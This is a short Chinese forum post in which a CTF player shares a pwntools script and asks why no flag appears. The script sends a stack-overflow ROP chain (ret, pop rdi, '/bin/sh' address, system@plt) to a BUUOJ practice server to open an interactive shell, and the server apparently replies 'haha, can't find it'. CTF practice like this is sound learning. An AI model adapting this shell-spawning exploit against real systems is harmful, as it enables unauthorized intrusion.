这题给我整懵了 我打通了 但是没有flag 附源码

from pwn import *
#p = process("./pwn1")
p = remote("node4.buuoj.cn",27757)
#context.log_level = 'debug'

sys_plt = 0x400490
bin_sh = 0x601048
pop_rdi = 0x400683
ret = 0x400479

payload = b'a'*(0x10) + p64(ret)+ p64(pop_rdi)+ p64(bin_sh) + p64(sys_plt)

p.sendline(payload)

p.interactive()

 

我得到的情况是这样的：

哈哈哈哈，找不到